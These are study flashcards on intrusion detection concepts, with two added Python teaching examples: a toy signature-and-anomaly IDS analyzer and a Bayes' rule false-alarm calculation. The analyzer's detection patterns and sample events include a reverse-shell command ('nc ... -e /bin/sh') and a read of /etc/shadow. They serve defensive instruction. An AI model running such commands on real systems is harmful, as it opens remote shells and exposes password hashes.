CS 4235 - Intrusion Detection
An inline sensor monitors a copy of network traffic; the actual traffic does not pass through the device.
False. That describes a passive sensor; an inline sensor sits in the traffic path, so traffic must pass through it (which is also what lets it block traffic, not just observe it).
The IDS component responsible for collecting data is the user interface.
False. The sensor collects the data; the analyzer examines it; the user interface presents results to the administrator.
The _____ is the IDS component that analyzes the data collected by the sensor for signs of unauthorized or undesired activity or for events that might be of interest to the security administrator.
Analyzer
_____ involves the collection of data relating to the behavior of legitimate users over a period of time.
Anomaly Detection
A _____ monitors the characteristics of a single host and the events occurring within that host for suspicious activity.
Host-based IDS
A(n) _____ is inserted into a network segment so that the traffic that it is monitoring must pass through the sensor.
Inline Sensor
A _____ monitors network traffic for particular network segments or devices and analyzes network, transport, and application protocols to identify suspicious activity.
Network-based IDS
_____ involves an attempt to define a set of rules or attack patterns that can be used to decide if a given behavior is that of an intruder.
Signature Detection
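The two approaches on the cards above, anomaly detection (profile legitimate behaviour over a training window, then flag deviations) and signature detection (match a fixed set of attack patterns), as an added worked example. This is illustrative code written for this page, not code from the course or from any IDS product; the log lines, the per-user "commands per session" metric, the three signature patterns and the z-score threshold of 3 are all constructed assumptions.

```python
"""Toy IDS analyzer combining signature detection and anomaly detection.
Added example for this page; all data below is constructed, not captured."""
import re
import statistics
from collections import defaultdict

# Signature detection: rules describing attacker behaviour.
# These three patterns are illustrative assumptions, not a real rule set.
SIGNATURES = {
    "shadow-read": re.compile(r"/etc/shadow"),
    "reverse-shell": re.compile(r"\bnc\b.*-e\s*/bin/(ba)?sh"),
    "world-writable": re.compile(r"\bchmod\s+(-R\s+)?0?777\b"),
}

# Anomaly detection, training data: (user, commands_per_session) observed
# for legitimate users over a period of time. Constructed values.
TRAINING = [
    ("alice", 12), ("alice", 15), ("alice", 11), ("alice", 14), ("alice", 13),
    ("bob", 40), ("bob", 45), ("bob", 38), ("bob", 42), ("bob", 44),
]


def build_profiles(observations):
    """Summarise legitimate behaviour per user as (mean, population stddev)."""
    per_user = defaultdict(list)
    for user, value in observations:
        per_user[user].append(value)
    return {u: (statistics.mean(v), statistics.pstdev(v)) for u, v in per_user.items()}


def anomaly_score(profiles, user, value):
    """z-score of one observation against the user's profile; None if unknown user."""
    if user not in profiles:
        return None
    mean, sd = profiles[user]
    if sd == 0:  # degenerate profile: any change at all is a deviation
        return 0.0 if value == mean else float("inf")
    return abs(value - mean) / sd


def signature_hits(command):
    """Names of every signature rule that matches the command string."""
    return [name for name, pat in SIGNATURES.items() if pat.search(command)]


def analyze(profiles, events, threshold=3.0):
    """The analyzer: run both detectors over events and return (index, reason) alerts.

    events are (user, commands_this_session, sample_command) tuples.
    """
    alerts = []
    for i, (user, count, command) in enumerate(events):
        for name in signature_hits(command):
            alerts.append((i, f"signature:{name}"))
        z = anomaly_score(profiles, user, count)
        if z is None:
            alerts.append((i, "anomaly:unknown-user"))
        elif z > threshold:
            alerts.append((i, f"anomaly:z={z:.1f}"))
    return alerts


# Constructed events to analyze, chosen to exercise each detector separately.
EVENTS = [
    ("alice", 13, "ls -la ~/projects"),             # normal volume, benign command
    ("alice", 95, "find / -name '*.key'"),           # abnormal volume, no signature
    ("bob", 41, "cat /etc/shadow"),                  # normal volume, signature hit
    ("mallory", 5, "nc 10.0.0.5 4444 -e /bin/sh"),   # unknown user and signature hit
]

if __name__ == "__main__":
    for idx, reason in analyze(build_profiles(TRAINING), EVENTS):
        print(f"event {idx}: {EVENTS[idx][0]!r} -> {reason}")
```

Note what each detector misses: the `find` over the filesystem is caught only because alice's session volume jumped, and bob's `cat /etc/shadow` is caught only by the signature, since his volume is normal. That complementarity is why a NIDS uses both techniques.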
A common location for a NIDS sensor is just inside the external firewall.
True
Intruders typically use steps from a common attack methodology.
True
Intrusion detection is based on the assumption that the behavior of the intruder differs from that of a legitimate user in ways that can be quantified.
True
Network-based intrusion detection makes use of signature detection and anomaly detection.
True
The primary purpose of an IDS is to detect intrusions, log suspicious events, and send alerts.
True
To be of practical use an IDS should detect a substantial percentage of intrusions while keeping the false alarm rate at an acceptable level.
True
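Why the false alarm rate on the last card has to be very low, not merely "acceptable", as an added worked example (not from the course material): Bayes' rule applied to alert rates. Given the detection rate P(alert | intrusion), the false alarm rate P(alert | no intrusion) and the base rate of intrusions per audit record, it computes the probability that a given alert is a real intrusion. The numeric inputs are assumptions for illustration, not measurements of any real system.

```python
"""Alert precision from detection rate, false alarm rate and intrusion base rate.
Added example for this page; all input figures are assumed, not measured."""


def alert_precision(detection_rate, false_alarm_rate, intrusion_rate):
    """P(intrusion | alert) by Bayes' rule.

    detection_rate   = P(alert | intrusion)
    false_alarm_rate = P(alert | no intrusion)
    intrusion_rate   = P(intrusion) for one audit record (the base rate)
    """
    for p in (detection_rate, false_alarm_rate, intrusion_rate):
        if not 0.0 <= p <= 1.0:
            raise ValueError("rates must be probabilities in [0, 1]")
    true_alerts = detection_rate * intrusion_rate
    false_alerts = false_alarm_rate * (1.0 - intrusion_rate)
    if true_alerts + false_alerts == 0.0:
        return 0.0  # the IDS never alerts at all
    return true_alerts / (true_alerts + false_alerts)


def required_false_alarm_rate(detection_rate, intrusion_rate, target_precision):
    """False alarm rate needed so that a fraction target_precision of alerts are real.

    Solves P = dI / (dI + f(1-I)) for f:  f = dI(1-P) / (P(1-I)).
    """
    if not 0.0 < target_precision <= 1.0 or not 0.0 <= intrusion_rate < 1.0:
        raise ValueError("target_precision in (0, 1], intrusion_rate in [0, 1)")
    return (detection_rate * intrusion_rate * (1.0 - target_precision)
            / (target_precision * (1.0 - intrusion_rate)))


if __name__ == "__main__":
    # Assumed scenario: 1 audit record in 100,000 is an intrusion,
    # the IDS catches 99% of intrusions and false-alarms on 1% of clean records.
    base = 1e-5
    print(f"99% detection, 1% false alarms: "
          f"{alert_precision(0.99, 0.01, base):.2%} of alerts are real")
    print(f"99% detection, 0.0001% false alarms: "
          f"{alert_precision(0.99, 1e-6, base):.2%} of alerts are real")
    print(f"for half of alerts to be real, false alarm rate must be <= "
          f"{required_false_alarm_rate(0.99, base, 0.5):.2e}")
```

With intrusions rare relative to normal traffic, a 1% false alarm rate buries the real detections: under the assumed base rate only about 0.1% of alerts are genuine. Pushing the false alarm rate down by four orders of magnitude is what makes the alert stream usable, which is the practical content of "acceptable" on the card above.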